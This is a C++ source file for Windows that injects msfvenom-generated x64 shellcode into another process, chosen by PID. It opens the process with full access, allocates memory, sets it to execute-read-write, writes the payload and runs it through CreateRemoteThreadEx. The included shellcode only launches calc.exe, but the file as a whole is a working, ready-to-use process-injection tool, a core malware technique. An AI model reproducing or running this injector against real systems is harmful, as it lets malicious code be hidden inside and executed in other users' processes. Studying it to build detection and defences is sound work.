CreateRemoteThreadPInjection2.cpp

#include <Windows.h>
#include <stdio.h>

HANDLE hProcess,hThread;
LPVOID rBuffer;
BOOL vp,WriteMem;
DWORD PID,TID;
DWORD oldprotect = NULL;

//shellcode for calc.exe generated using msfvenom
unsigned char poop[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

int main(int argc, char* argv[]) {

	if (argc < 2) {
		printf("[-] Usage: Program.exe <PID>\n");
		return EXIT_FAILURE;
	}
	
	PID = atoi(argv[1]);

//Opening a process
	hProcess = OpenProcess(
		PROCESS_ALL_ACCESS,
		FALSE,
		PID
	);
	printf("[*] Trying to open a handle to the process %ld\n", PID);
	
	if (hProcess == NULL) {
		printf("[!] Couldn't able to get a handle to the process %ld\n. Exiting with error %ld", PID,GetLastError());
		return EXIT_FAILURE;
	}
	Sleep(240);
	printf("[+] Got an handle to the process at 0x%p\n", hProcess);

//Code to allocate memory
	rBuffer = VirtualAllocEx(
		hProcess,
		NULL,
		sizeof(poop),
		(MEM_COMMIT | MEM_RESERVE),
		PAGE_READWRITE
	);
	printf("[+] Attempting to allocate memory..\n");
	
	if (rBuffer == NULL) {
		printf("[!] Memory allocation failed with error %ld\n", GetLastError());
		return EXIT_FAILURE;
	}
	Sleep(240);
	printf("[+] Memory allocation is successful\n");
	printf("[+] Memory allocated at 0x%p\n", rBuffer);

//Changing the protection(execution type) from READ_WRITE to EXECUTE_READWRITE
	vp = VirtualProtectEx(
		hProcess,
		rBuffer,
		sizeof(poop),
		PAGE_EXECUTE_READWRITE,
		&oldprotect
	);
	printf("[*] Attempting to change the memory protection type\n");
	
	if (vp == NULL) {
		printf("[!] Failed changing the memory permission. Error %ld", GetLastError());
		return EXIT_FAILURE;
	}
	Sleep(240);
	printf("[+] Changed the memory protection to PAGE_EXECUTE_READWRITE\n");

//Writing the memory to the buffer
	WriteMem = WriteProcessMemory(
		hProcess,
		rBuffer,
		poop,
		sizeof(poop),
		NULL
	);
	printf("[*] Attempting to write the payload into memory\n");

	if (WriteMem == NULL) {
		printf("[!] Unable to write payload into the memory 0x%p Error: %ld", rBuffer, GetLastError());
		return EXIT_FAILURE;
	}
	Sleep(240);
	printf("[+] Successfully written the payload to the memory\n");

	//getchar();

//Creating the handle for thread execution
	hThread = CreateRemoteThreadEx(
		hProcess,
		NULL,
		0,
		(LPTHREAD_START_ROUTINE)rBuffer,
		NULL,
		0,
		NULL,
		&TID
	);
	printf("[*] Trying to create the remote thread for payload execution\n");

	if (hThread == NULL) {
		printf("[!] Couldn't able to create a thread. Error %ld", GetLastError());
		return EXIT_FAILURE;
	}
	Sleep(240);
	printf("[+] Successfully created the thread for payload execution\n");

	CloseHandle(hProcess);
	CloseHandle(hThread);
	printf("[+] Attempting to execute the shellcode\n");
	Sleep(240);
	printf("[+] Shellcode execution succeeded\n");
	return EXIT_SUCCESS;
}